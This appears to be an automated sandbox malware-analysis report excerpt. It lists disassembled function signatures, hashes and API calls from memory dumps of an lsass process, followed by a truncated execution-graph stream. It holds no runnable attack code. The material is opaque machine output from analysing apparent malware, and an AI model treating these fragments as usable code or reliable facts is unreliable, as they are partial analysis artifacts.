                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: 71a3230ece6bef7479f4e2890e5adf1a87b513b83bb6095f49a83735daaef3e4
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: E8515BB2200A808EEB668F21B58C35C76B0E355BC4F146217DA9EA7FD5CB3CD8A5C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                          • Instruction ID: 04b5bc7be5bae2e231b41602a3925eddeedc2558ddb853d7041854d0f4e41136
                                                          • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                          • Instruction Fuzzy Hash: 24117FA1314F819AEB919F25F85D39A56A4F7447E0F9444629E4EA3F94EF2CCD04C740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                          • Instruction ID: 87ea7e14d2d76aee394001ea6eb3b3dc7dbb72b68501625102b15bc11e301b5e
                                                          • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                          • Instruction Fuzzy Hash: ECD1BEB7B04A808DE711CFA9E44829C37B1F3547D8F54421ADE5E9BF99DA38C84AC740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                          • Instruction ID: 9d04490a5e2fbcb8dfec4f4e7dc08825bcd3f5b62e1391709303a6a03f8b2330
                                                          • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                          • Instruction Fuzzy Hash: 8E014C72600ED0CAD744DF66F84C24AA7A0F788FC0F144426EE4E53B19DE38D851C740
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002D6F1522D9B), ref: 000002D6F1522ECC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002D6F1522D9B), ref: 000002D6F1522F57
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                          • Instruction ID: 92e1807aa898a0b2b4613ca21d82bc4f10f96b9a7745d83c59c66e000c55cf7b
                                                          • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                          • Instruction Fuzzy Hash: E6918CA7610E908DF7A09F65A48D7AD6BA0B744BC8F54411EDE0F67E99DA3CCC82C710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                          • Instruction ID: 06b4efff5b6c160b7dc9c4b7bd4f778f21c86f1fa3c020589f51172ef4ae19d9
                                                          • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                          • Instruction Fuzzy Hash: 8F11E866710F448EEF008F60E8993A933A4F759798F441E26DE6E46BA4DB7CC5998380
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                          • Instruction ID: 8d0a257d0caca75355a0c7b1b12a1f23c93301f2e9b2ee0cbe80525b15093ef4
                                                          • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                          • Instruction Fuzzy Hash: D9615937604F848AEB20DF65E48839D77A0F384BC8F144216EF5A17B99DB78DA95C710
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                          • Instruction ID: a65ad775bb423b37c431d461dad3b794233cd1dd6003edd2ca36412c875c725d
                                                          • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                          • Instruction Fuzzy Hash: 575107A6204B8189EA669F25B4AC36AA751F3857C0F66011BDE4F27F99DE3DCC44CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: _log10_special
                                                          • String ID: dll
                                                          • API String ID: 3812965864-1037284150
                                                          • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                          • Instruction ID: d29dea122ef367423192d766315d926b2feafc5fa2c5c6954ae55b370387667b
                                                          • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                          • Instruction Fuzzy Hash: E6614E21925F488CE6639B39B86D2256718BFA33C9F41D317E82B77F69DB1C98078200
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                          • Instruction ID: 3bb12b5c87f35b63ff020a461a0ba4d7719bd7d288c1a8db06b5396424dc50a6
                                                          • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                          • Instruction Fuzzy Hash: 9141A0A7314E809ADB209F65F44C3AA67A1F7987D4F804026EE4E87B94DB7CC841CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                          • Instruction ID: 472425e9a0a945d8f88ad4a04fa043c181074d06b5dab1dbaaebe19d85c956ef
                                                          • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                          • Instruction Fuzzy Hash: EF112B72615F8482EB218F25F45835977E5F788B98F584225EE8D17B58DF3CC9518B00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: `vector constructor iterator'$ctor closure'
                                                          • API String ID: 592178966-3792692944
                                                          • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                          • Instruction ID: 6421eaac3b253b903766460ea74f787798e4bab0b4f12f5c5ce9bd20b43d90da
                                                          • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                          • Instruction Fuzzy Hash: FAE08661641F44D4DF058F22F48829833A4DB99B94B4991239A6D0B315FA3CD6E9C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: ctor closure'$destructor iterator'
                                                          • API String ID: 592178966-595914035
                                                          • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                          • Instruction ID: 3043f56b623956e0d24dd6aa4450355004b171e1966781238bfcc48730eb3f6c
                                                          • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                          • Instruction Fuzzy Hash: 70E08661601F44C4DF058F21E4841983364E799B94B8891238A6D0B315EA3CD5E5C300
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: std::bad_alloc::bad_alloc
                                                          • String ID: `scalar deleting destructor'$rFeaturePresent
                                                          • API String ID: 1875163511-1689945142
                                                          • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                          • Instruction ID: 4145a2b33f49a0204eeba2a9ae845424453b5d6c24a68af7af6fa8d1c576e3aa
                                                          • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                          • Instruction Fuzzy Hash: 8CD09E22211E8599EE10EB04F88D7896334F3D4799F904413925E42EB9DF2CCF4AD750
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                          • Instruction ID: 847c43cd6a541c41a2bc10a9def4f75ee983d8fed6796b9f9604382c83c137d8
                                                          • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                          • Instruction Fuzzy Hash: B8118066A01F8089EB05CF76F44C21A67A1F789FD5F694126DE4EA3B25DF3CD8428300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                          • Instruction ID: 96f73450a87a06c1df04f858679f87d5cd367a94e33e99f658e4b488cb58d552
                                                          • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                          • Instruction Fuzzy Hash: BBE06DB2601A808AE7048F62E80C349B7E1FB88F86F14C024CD0E07751DF7D98998740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                          • Instruction ID: 4c2064e12f9cce17a0b9e9519d123edc699b36f5fa7e42d3a40c70041ff6d4f1
                                                          • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                          • Instruction Fuzzy Hash: 33E012B26119808BE7089F62E80C359B7E1FB8CF56F548025CD0E07711DE3C9899C710

                                                          Execution Graph

                                                          Execution Coverage: 2.2%
                                                          Dynamic/Decrypted Code Coverage: 0%
                                                          Signature Coverage: 0%
                                                          Total number of Nodes: 899
                                                          Total number of Limit Nodes: 2
2308->2313 2310 140003c00 _wcsnicmp 2309->2310 2311 140003c16 wcslen 2310->2311 2310->2313 2311->2310 2311->2313 2312 140003ce2 wcscpy wcscat memset 2315 140003d24 2312->2315 2313->2312 2314 140003d67 wcscpy wcscat memset 2316 140003dad 2314->2316 2315->2314 2317 140003ddd wcscpy wcscat 2316->2317 2318 1400061b3 memcpy 2317->2318 2320 140003e0f 2317->2320 2318->2320 2319 140003f62 wcslen 2322 140003fa7 2319->2322 2320->2319 2321 14000400c wcslen memset 2535 14000157b 2321->2535 2322->2321 2324 14000468f memset 2326 1400046be 2324->2326 2325 140004703 wcscpy wcscat wcslen 2576 14000146d 2325->2576 2326->2325 2330 140004679 2331 14000145e 2 API calls 2330->2331 2334 140004674 2331->2334 2332 1400048a3 2339 1400048e2 memset 2332->2339 2333 14000157b 2 API calls 2369 140004135 2333->2369 2334->2324 2337 140004813 2662 1400014a9 2337->2662 2338 1400048bf 2341 14000145e 2 API calls 2338->2341 2343 140006294 2339->2343 2344 140004906 wcscpy wcscat wcslen 2339->2344 2341->2332 2386 140004a30 2344->2386 2347 1400048af 2352 14000145e 2 API calls 2347->2352 2348 14000145e 2 API calls 2348->2369 2350 1400044a4 _wcsnicmp 2354 14000465c 2350->2354 2350->2369 2352->2332 2356 14000145e 2 API calls 2354->2356 2355 140004897 2357 14000145e 2 API calls 2355->2357 2360 140004668 2356->2360 2357->2332 2358 140004502 _wcsnicmp 2358->2354 2358->2369 2359 140004b29 wcslen 2361 14000153f 2 API calls 2359->2361 2362 14000145e 2 API calls 2360->2362 2361->2386 2362->2334 2363 140005e3f memcpy 2363->2386 2364 140004556 _wcsnicmp 2364->2354 2364->2369 2365 14000145e NtMapCMFModule malloc 2365->2386 2366 140004c9d wcslen 2370 14000153f 2 API calls 2366->2370 2367 140004327 wcsstr 2367->2354 2367->2369 2368 140005f7c memcpy 2368->2386 2369->2324 2369->2330 2369->2333 2369->2348 2369->2350 2369->2358 2369->2364 2369->2367 2552 140001599 2369->2552 2565 1400015a8 2369->2565 2370->2386 2371 14000515d wcslen 2373 14000153f 2 API calls 2371->2373 2372 140004ef1 wcslen 2374 14000157b 2 API calls 
2372->2374 2373->2386 2374->2386 2375 140005ad1 wcscpy wcscat wcslen 2378 140001422 2 API calls 2375->2378 2376 140005fb4 memcpy 2376->2386 2377 140004f74 memset 2377->2386 2378->2386 2379 140004fde wcslen 2380 1400015a8 2 API calls 2379->2380 2380->2386 2383 140005046 _wcsnicmp 2383->2386 2384 140005c1c 2384->2265 2385 140005cc7 wcslen 2387 1400015a8 2 API calls 2385->2387 2386->2359 2386->2363 2386->2365 2386->2366 2386->2368 2386->2371 2386->2372 2386->2375 2386->2376 2386->2377 2386->2379 2386->2383 2386->2384 2386->2385 2388 140005874 memset 2386->2388 2389 1400027d0 11 API calls 2386->2389 2390 140005a70 memset 2386->2390 2391 1400060a6 memcpy 2386->2391 2392 1400058db memset 2386->2392 2393 140005935 wcscpy wcscat wcslen 2386->2393 2778 1400014d6 2386->2778 2823 140001521 2386->2823 2921 140001431 2386->2921 2387->2386 2388->2386 2388->2390 2389->2386 2390->2386 2391->2386 2392->2386 2852 140001422 2393->2852 2396 140001394 2 API calls 2395->2396 2397 14000154e 2396->2397 2398 140001394 2 API calls 2397->2398 2399 14000155d 2398->2399 2400 140001394 2 API calls 2399->2400 2401 14000156c 2400->2401 2402 140001394 2 API calls 2401->2402 2403 14000157b 2402->2403 2404 140001394 2 API calls 2403->2404 2405 14000158a 2404->2405 2406 140001394 2 API calls 2405->2406 2407 140001599 2406->2407 2408 140001394 2 API calls 2407->2408 2409 1400015a8 2408->2409 2410 140001394 2 API calls 2409->2410 2411 1400015b7 2410->2411 2412 140001394 2 API calls 2411->2412 2413 1400015c6 2412->2413 2414 140001394 2 API calls 2413->2414 2415 1400015d5 2414->2415 2416 140001394 2 API calls 2415->2416 2417 1400015e4 2416->2417 2418 140001394 2 API calls 2417->2418 2419 1400015f3 2418->2419 2419->2288 2420 140001503 2419->2420 2421 140001394 2 API calls 2420->2421 2422 14000150d 2421->2422 2423 140001394 2 API calls 2422->2423 2424 140001512 2423->2424 2425 140001394 2 API calls 2424->2425 2426 140001521 2425->2426 2427 140001394 2 API calls 2426->2427 2428 140001530 2427->2428 2429 
140001394 2 API calls 2428->2429 2430 14000153f 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000154e 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000155d 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000156c 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000157b 2437->2438 2439 140001394 2 API calls 2438->2439 2440 14000158a 2439->2440 2441 140001394 2 API calls 2440->2441 2442 140001599 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015a8 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015b7 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015c6 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015d5 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015e4 2451->2452 2453 140001394 2 API calls 2452->2453 2454 1400015f3 2453->2454 2454->2291 2455 14000156c 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000157b 2456->2457 2458 140001394 2 API calls 2457->2458 2459 14000158a 2458->2459 2460 140001394 2 API calls 2459->2460 2461 140001599 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015a8 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015b7 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015c6 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015d5 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015e4 2470->2471 2472 140001394 2 API calls 2471->2472 2473 1400015f3 2472->2473 2473->2291 2474 14000145e 2473->2474 2475 140001394 2 API calls 2474->2475 2476 14000146d 2475->2476 2477 140001394 2 API calls 2476->2477 2478 14000147c 2477->2478 2479 140001394 2 API calls 2478->2479 2480 14000148b 2479->2480 2481 140001394 2 API calls 2480->2481 2482 14000149a 2481->2482 2483 140001394 2 API calls 2482->2483 2484 1400014a9 2483->2484 2485 140001394 2 API calls 2484->2485 2486 1400014b8 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014c7 2487->2488 2489 140001394 2 API calls 2488->2489 2490 1400014d6 2489->2490 2491 
